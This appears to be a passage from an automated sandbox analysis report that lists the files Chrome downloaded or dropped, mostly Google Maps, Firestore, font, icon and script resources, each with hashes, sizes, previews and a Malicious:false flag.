                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):17
                                                          Entropy (8bit):3.292770193936991
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:287F9CABB3776C8A8FC3D623A2C48BDA
                                                          SHA1:CD4C0962C594BCB5FE1B4F8EE4A6B59F70C3A2FA
                                                          SHA-256:B9D5D92B0631B2F8515EE96CF6418753A5B39D6028508AA364A9202472562C19
                                                          SHA-512:422E07DBE2108854658AB2392D00E3501ECB6A4D793309B9C03C430FF3B417FD029481B641D5D03DE01A9BEFEBE50BB44C764F985876F93246F2056A87C755C1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://firestore.googleapis.com/google.firestore.v1.Firestore/Listen/channel?gsessionid=0eMNjqZE2aeesM7eqWtNa6yTcqgUDP5UEjnQ5cKVhss&VER=8&database=projects%2Fdatastudio-prod-firestore%2Fdatabases%2F(default)&RID=rpc&SID=r1fr_66omoSAissrZgNRkA&AID=6&CI=0&TYPE=xmlhttp&zx=tcpawlplrk2s&t=1
                                                          Preview:14.[[7,["noop"]]]
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:dropped
                                                          Size (bytes):3620
                                                          Entropy (8bit):6.867828878374734
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):3
                                                          Entropy (8bit):1.584962500721156
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                          SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                          SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                          SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                          Preview:{}.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 455713
                                                          Category:dropped
                                                          Size (bytes):122938
                                                          Entropy (8bit):7.997721281671076
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:96E339D86011BDAC1FB27E77B9CB3B36
                                                          SHA1:BA352B1214AB132DCFE4A139FE0A39378A6ADE38
                                                          SHA-256:A2A45D472C6B2C0215AE6E643DEA95268E3DBBB813DB2FCB991415E09671F6FE
                                                          SHA-512:554EEDD482D091DD1F79A51B24E41AD446F1D3FD1F57466D0CC1FB75EB87AC19219955167E8167B0AEE4C4358BAFA8EC7CB4B6633AFD0D52B0C461349E042197
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........{w.8.8.....fn..(..o+....*.I.....Merd.v.%.$.1.......([NU....s.Q.H... .....w.......Oit....OJ.O..J..............F....^\.x>+...3....0*y..F.0....f.o..~i...R..J.(..9I\.8.Bc..2T...K;J^K...*..6o..P.....!).a.9.d.....G..."pYTz~...Da.N.R...=A#....M.%;b..%.I.%......!E.15.[...:..P.........8_...L...U..ie..|.JIXz.....x.`Z...bj......I..a.,z...~)..D...%.2....-M#;@...`..i......cTt.Z.fs...L/.8..s...R..^...J.?.0.W..K.z.h..Z.5....d...>L..a1.:.......C.G.....G..?c^....,]....Q8..@.u.b.4..K..!`_.....q|q.?]..<>.L....+..R........d..uO...v.G...c..;...A.KX.Y0M....g...>....'a.:g..;.>...9.b.:0.e[.*....w...T......JE..V..;....wU...TYf....?.....ua8...i....$)W.....\..7... EC.h.&e.6..D,YDA..W.Na!..T..$k..;..2..ju .1,D}LdY=..a.>|k....ND/.A...}{+'V?..W%#..o)a.S....c!P8..UI.".n.{.]C.q...-u..a.....$z%...[*.CX......l.}.U.Q.......\.nT..........Z...LK.~.|."...D;U{>._....T$.C..^|)..'e..!.k2=...)Y! )..+.Y.#%........C..>0.r_oo..%.>....=..g..!.V....<%J.D......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 36216, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):36216
                                                          Entropy (8bit):7.994185155139824
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:7C702451150C376FF54A34249BCEB819
                                                          SHA1:3AB4DC2F57C0FD141456C1CBE24F112ADF3710E2
                                                          SHA-256:77D21084014DCB10980C296E583371786B3886F5814D8357127F36F8C6045583
                                                          SHA-512:9F1A79E93775DC5BD4AA9749387D5FA8EF55037CCDA425039FE68A5634BB682656A9ED4B6940E15226F370E0111878ECD6EC357D55C4720F97A97E58ECE78D59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                          Preview:wOF2.......x......................................\...t...?HVAR...`?STAT..'...B/<.....H..!....0..T.6.$..V. .....:..[.aq.9.zk...R...fpY..5..n5.)$&%x...v..R.....?5A.....0W:55.{..p+\...adD.H.dh......t5..S....T..5.TT.F...lI...h3..T9M0...*c...I...Yu.#.%...o......u....&\.O.zIE..#...)o...5...7.A.@7.Q...Q..i......_5...3............cV.!.|..]6..HLa.a.........s.J...........5..VDC,g..TcY.*....n.....$/.....B..!B.......T...2...."..5..k...........H._)R.Q?.....C.[2.,p. ...[.m..@ri.....[V.U....u.....X.....-......d...YN..a..t...b|3.4.............P.Q......t.....JR.tM.y.......Xf6..5......FV..U#..O....E.A...e@.d............(...q.....Y....Og.w.6..JU...%c.Lw..D....,..|..2...?=.?....I...W.a.'|c.........9.7...@...F.r...". h[.F....Tu...5.V.Z.U..~'......,.~6.#..Pm.%W`.B..1u5..bt...I...t...6.[/....z.D.@.@H..L.E..3......Z*.@./j.D..D..%.....P.....-;kwL6'-.%.!0....VYW.~.......9...93..(..&z%.Q...5.|..`^OJ.i.+.....=..*.h6.....6X8Hm...oi.T5....P....8ehl.l.]U..V...m..IN.K.j..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):6.640973516071413
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):72
                                                          Entropy (8bit):4.241202481433726
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):246
                                                          Entropy (8bit):4.316931158950511
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8B6C7812BA9EFAB131F916BDF12566F6
                                                          SHA1:D355101604837D05D76D41CBE225E785728E190A
                                                          SHA-256:6C7113DA4BF372FEB6C320A461F0C510FA8B92626A52B08CDEDA3063070B3570
                                                          SHA-512:705AE0C16E7AC9F245A28E6BF72586E8092B0146F09B06732E5F93F95708F6FEE1532857AF628ACB1810715E6BB94FFD5173C9606736BEC3BFF2FAAD46F9CA7F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/images/icons/material/system_gm/svg/more_vert_24px.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):1185
                                                          Entropy (8bit):4.98533471519635
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:6260E4E4919453F321DEF0E5CBDCBBB8
                                                          SHA1:5CC22647F36A5CE1816371D77E8FEF256AF5C856
                                                          SHA-256:9F5C98888D690D0E1D9F19F93D7B85ECE5E3AA9C6CC8972D9CBC2D7BD6E1B3DF
                                                          SHA-512:67182BE169E5A70FD91973B13C70E4273478FE8137DF5D329D3A2617A318B858B7915CA8D482B5BA89486EEA1D053A13A49AC1722A46083C104B97256B146E9F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.googleapis.com/icon?family=Material+Icons|Material+Icons+Extended
                                                          Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}./* fallback */.@font-face {. font-family: 'Material Icons Extended';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialiconsextended/v152/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvJ.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}...material-icons-extended {. font-family: 'Material Icons Extended';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-t
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4219)
                                                          Category:dropped
                                                          Size (bytes):121824
                                                          Entropy (8bit):5.4754684566128775
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BEA3C357EA4EAB5C6CD893B55981CCDA
                                                          SHA1:A6D701E6F37A230D12A3D8A68AA908359D7C2BC1
                                                          SHA-256:BE3CCB220E778E5EDD499F30215FE0174A2E58A7F6472BA513C7AE63FF2459F5
                                                          SHA-512:7426BD5AE3802F2D13F0EF37539DCFC5E91D24D630CF5D42043E203FEC56B686FEE054A52D96F0AD9C72DAD6FE4814B3B4FE4DDCB4E8777D30A79E03F0AE4737
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),u=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.$jscomp$symbol$id_=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.rand
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                          Category:downloaded
                                                          Size (bytes):621
                                                          Entropy (8bit):7.673946009263606
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4761405717E938D7E7400BB15715DB1E
                                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10822)
                                                          Category:downloaded
                                                          Size (bytes):253110
                                                          Entropy (8bit):5.643647700558818
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:24A5F1ADC10DE3A371D51E79DEEE9C7A
                                                          SHA1:934AA894BA2AB9C92D262BE821B01C1AE87CF813
                                                          SHA-256:4A7FB032190C963CB48776572370FD8CC52F6385B3145F6C4420B95278BB8694
                                                          SHA-512:E2AAE075B9BABBE6D01F6D8F5416AB2BFD9AB9EBE06EEA1EC00BE5EC551BA67F836136C7349B6F7755382635D85509528788E16B52EC24ECE634F71F3D315CF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://maps.googleapis.com/maps/api/js?key=AIzaSyAng4TaCSbwmEwKIdn9M0m9ZHpzjAkbMw8&v=3&callback=loadMapsApiCallback&language=en-US&region=US&libraries=visualization
                                                          Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=995\u0026hl=en-US\u0026gl=US\u0026","https://khms1.googleapis.com/kh?v=995\u0026hl=en-US\u0026gl=US\u0026"],null,null,null,1,"995",["https://khms0.google.com/kh?v=995\u0026hl=en-US\u0026gl=US\u0026","https://khms1.google.com/kh?v=995\u0026hl=en-US\u0026gl=US\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en-US\u0026gl=US\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en-US\u0026gl=US\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en-US\u0026gl=US\u0026","https://khms1.google.com/kh?v=163
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5960)
                                                          Category:dropped
                                                          Size (bytes):334977
                                                          Entropy (8bit):5.600463458730832
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:28C29902AE790EB74CF7FB52C51CEDE6
                                                          SHA1:D2C923C601FA72DCF40BACCBA483CFDA6715E170
                                                          SHA-256:06E0A29D93870BD79342CE290F5CCF7DBF2B86982061C6437A35C0E83A3422E5
                                                          SHA-512:80656018474D506E5B488FE33D5871A5D26D93E97B327EF085573ED80CF289BF1C1BC45096432A75DF0E4636F10FA3269F25413A110130C1DEC48808B9B90047
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":10,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):691
                                                          Entropy (8bit):4.687785150464502
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8FABD28E8D9FC2610616A0B910B2CB4A
                                                          SHA1:3619D8C82D6D86B5BB58C3E2A27A0F060B92A0A5
                                                          SHA-256:5DBA7616F3775D2EDFE3AD9AFAC047917049C0B2F6D44DA90B0A1BC408D7A111
                                                          SHA-512:C84B3A9138763A03A51937DB2C75691D6744FBDE337404CCE4392BA2A8171C025B4F7D719091BB51D4F10592623A9FC32FB9D88C1570F46AE8448DFF623851A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{. "error": {. "code": 403,. "message": "Requests from referer \u003cempty\u003e are blocked.",. "status": "PERMISSION_DENIED",. "details": [. {. "@type": "type.googleapis.com/google.rpc.ErrorInfo",. "reason": "API_KEY_HTTP_REFERRER_BLOCKED",. "domain": "googleapis.com",. "metadata": {. "service": "people-pa.googleapis.com",. "httpReferrer": "\u003cempty\u003e",. "consumer": "projects/371237729773". }. },. {. "@type": "type.googleapis.com/google.rpc.LouserzedMessage",. "locale": "en-US",. "message": "Requests from referer \u003cempty\u003e are blocked.". }. ]. }.}.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):736
                                                          Entropy (8bit):5.1651771883922795
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4796D40FB5B4A306A024C6BDA7511FD6
                                                          SHA1:A2E09EF16D96A1D7B68C38A5330A26174F23B7C4
                                                          SHA-256:A731909EF87A24CBED00B0856627A4A3FBE368424FDFCE5235D3D404773FC48A
                                                          SHA-512:0ACBF94541A22E567BF21043264B2B9E74A8AE08D725360D91230B002437E545D917AD12C1C853AC5F9C2930B3CFF0C49CA5372C277D6C1A31CE70CF87FFB84F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="-1475 1477 48 48" style="enable-background:new -1475 1477 48 48;" xml:space="preserve">.<style type="text/css">...st0{fill:rgba(0,0,0,0.54);}...st1{fill:none;}.</style>.<path class="st0" d="M-1451,1477c-13.3,0-24,10.7-24,24s10.7,24,24,24s24-10.7,24-24S-1437.7,1477-1451,1477z M-1451,1484.2c4,0,7.2,3.2,7.2,7.2..c0,4-3.2,7.2-7.2,7.2s-7.2-3.2-7.2-7.2C-1458.2,1487.4-1455,1484.2-1451,1484.2z M-1451,1518.3c-6,0-11.3-3.1-14.4-7.7..c0.1-4.8,9.6-7.4,14.4-7.4s14.3,2.6,14.4,7.4C-1439.7,1515.2-1445,1518.3-1451,1518.3z"/>.<path class="st1" d="M-1475,1477h48v48h-48V1477z"/>.</svg>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):432
                                                          Entropy (8bit):5.311341743774525
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2EEFCC209413C3F0F979AB2464D85D2A
                                                          SHA1:095055482AC5E1A6CE1FB810B67C6AC847F7BBE4
                                                          SHA-256:93CEFA9DE4D9E01BC50DD526DB6102DECEBCBC84D7506D88CC4B37CC52E40EC3
                                                          SHA-512:9101246BADEBBC6EF253BD64867693B185A302698D193EFED7D2B72B019AEEC61EC7BE635F59C67A7BFA425425FBD598A694359DFCBB1A5127A990851DE41777
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-people-pa.googleapis.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
                                                          Preview:<!DOCTYPE html>.<html>.<head>.<title></title>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />.<script type="text/javascript" nonce="S2i5NCpV5SIa4uztCY2L1A">. window['startup'] = function() {. googleapis.server.init();. };.</script>.<script type="text/javascript". src="https://apis.google.com/js/googleapis.proxy.js?onload=startup" async. defer nonce="S2i5NCpV5SIa4uztCY2L1A"></script>.</head>.<body>.</body>.</html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):28
                                                          Entropy (8bit):4.307354922057605
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                          SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                          SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                          SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnTHEKeH5O3bBIFDdFbUVISBQ1Xevf9?alt=proto
                                                          Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                          Category:dropped
                                                          Size (bytes):1566
                                                          Entropy (8bit):5.263730433848033
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:90FBA15F85654BEB963D66CF6788FA46
                                                          SHA1:E062B36BAB3022A99FDF8AC13199A4E3490CC826
                                                          SHA-256:046F4A44111341FA57748B7A865F5B8E9220851578AED66EDF473D9464A0E72F
                                                          SHA-512:49763A4442E5B9FA8B2473D9ABAC0D0831E098A2213A14731EFC22334B6940D65346175E5DD470C29E930D51B9D4B82D5EE755F8D9159B7FBA4DF6683DBAFCAB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):334
                                                          Entropy (8bit):5.085703756761443
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:41FB3F6666DB2C18DE8B5DED8796195C
                                                          SHA1:ADFEADAC45E9BC6B5C112EB6D51AAE9C2020BD46
                                                          SHA-256:BBB5ED0D166D1EF2DBF5F980BD320FEE22AE9B18FC4866E2425A50699246B5D7
                                                          SHA-512:5FD2A7F57A30668A669CFD295734346E1787179A55F40DFC1FD9A5EA140E9C0324B4516A20350E5A6171E90FC18EF41C8C8B66109DC2018232C4EBC147BED3D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/images/icons/material/system_gm/svg/content_copy_24px.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><g><rect fill="none" height="24" width="24"/></g><g><path d="M16,20H5V6H3v14c0,1.1,0.9,2,2,2h11V20z M20,16V4c0-1.1-0.9-2-2-2H9C7.9,2,7,2.9,7,4v12c0,1.1,0.9,2,2,2h9 C19.1,18,20,17.1,20,16z M18,16H9V4h9V16z"/></g></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 128352, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):128352
                                                          Entropy (8bit):7.998349465466699
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:53436ACA8627A49F4DEAAA44DC9E3C05
                                                          SHA1:0BC0C675480D94EC7E8609DDA6227F88C5D08D2C
                                                          SHA-256:8265F64786397D6B832D1CA0AAFDF149AD84E72759FFFA9F7272E91A0FB015D1
